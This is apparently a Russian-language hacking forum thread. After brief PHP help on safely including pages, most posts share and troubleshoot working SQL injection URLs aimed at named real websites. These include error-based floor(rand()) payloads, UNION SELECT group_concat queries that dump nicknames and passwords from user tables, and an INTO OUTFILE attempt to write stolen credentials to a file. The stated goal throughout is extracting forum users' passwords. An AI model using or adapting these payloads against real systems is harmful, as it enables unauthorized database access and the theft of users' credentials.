в принципе да помогло инклуда больше нету... но теперь неоткрываются другие странички http://www.site.ru/index.php?page=activ.htm http://www.site.ru/index.php?page=presentations.htm вопрос как их туда добавить? чет у меня не получилось пока....
А зачем делать через зад, если вот дали нормальный вариант: https://forum.antichat.ru/showpost.php?p=1973181&postcount=12068 Или нужно понаставить фильтров, и думать обойдут их или нет?
PHP: <? $page = $_GET['page']; if ($page=="") { switch($page) { case 'page1': include("page1.html"); break; case 'page2': include("page2.html"); break; case 'page3': include("page3.html"); break; ... default: include("home.html"); break; } ?> да я так поначалу и пробовал,но!!! parse error: syntax error, unexpected '.' in /web/clients/index.php
да там одна лишняя фигурная но всеравно странички которые написал вместо xxx.htm неоткрываются вместо них просто пустое место.... PHP: case 'page1': include("xxx.htm"); break; case 'page2': include("xxxx.htm"); break;
в самое начало скрипта вставь @ini_set("display_errors","1"); и вообще для кодинга есть другой раздел
Полностью согласен. Остальной оффтоп потру. PS Ну вот видишь, по некоторым вопросам и у нас может быть единство взглядов.
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+ говорит SQL/DB Error -- [Unknown column 'Email' in 'field list'] удаляю Email потом грит что нету Password и тд. тоесть не выводит инфо ???!!! Нельзя ли через floor rand вывести инфо?
Не удивительно, ведь SQL запросов походу два(или больше) т.к. Code: http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+52/* еще что-то выдает, а Code: http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+53/* Уже вообще пустой экран
Помогите плииз раскрутить иньекцию http://relax.oko16.ru/uslugi.php?id=79999+union+select+1,2,3,4,5,6,7,database(),9,10,123,1,1,1,1 Доступа к information cheme нет(( версия мускуля 4.1 Не могу правильно составить запрос с использованием SHOW FULL COLUMNS FROM admin C ночи уже сижу((((
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+ говорит SQL/DB Error -- [Unknown column 'Email' in 'field list'] удаляю Email потом грит что нету Password и тд. тоесть не выводит инфо ???!!! Нельзя ли через floor rand вывести инфо? ну в information_schema.columns должны быть все имена колонок
Вот есть инъекция: Code: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,NickName,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,12+from+fusers+--+ При таком вводе отображаются ники и пассы юзеров. Хочу спросить это отображаются все юзеры? При вводе LIMIT вообще ничего нет. И как слить базу этих пользователей?
Ну они там и есть,делается вот так: Дальше через лимит.Можно не перебирать а сделать вот так: Code: SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
есть скуля. хочу вытянуть пароли от форума, но имя бд где лежат пассы содержит -. когда делаю запрос from db-forum.forum_user,то выдает синтаксическую ошибку( можно всё таки как-то вытащить пассы? UPD: решил, `db-forum`.forum_user
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,NickName,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,12+from+fusers+into+outfile+%271.txt%27+--+ Что не так? Выдает ошибку. Надо все записать в файл.
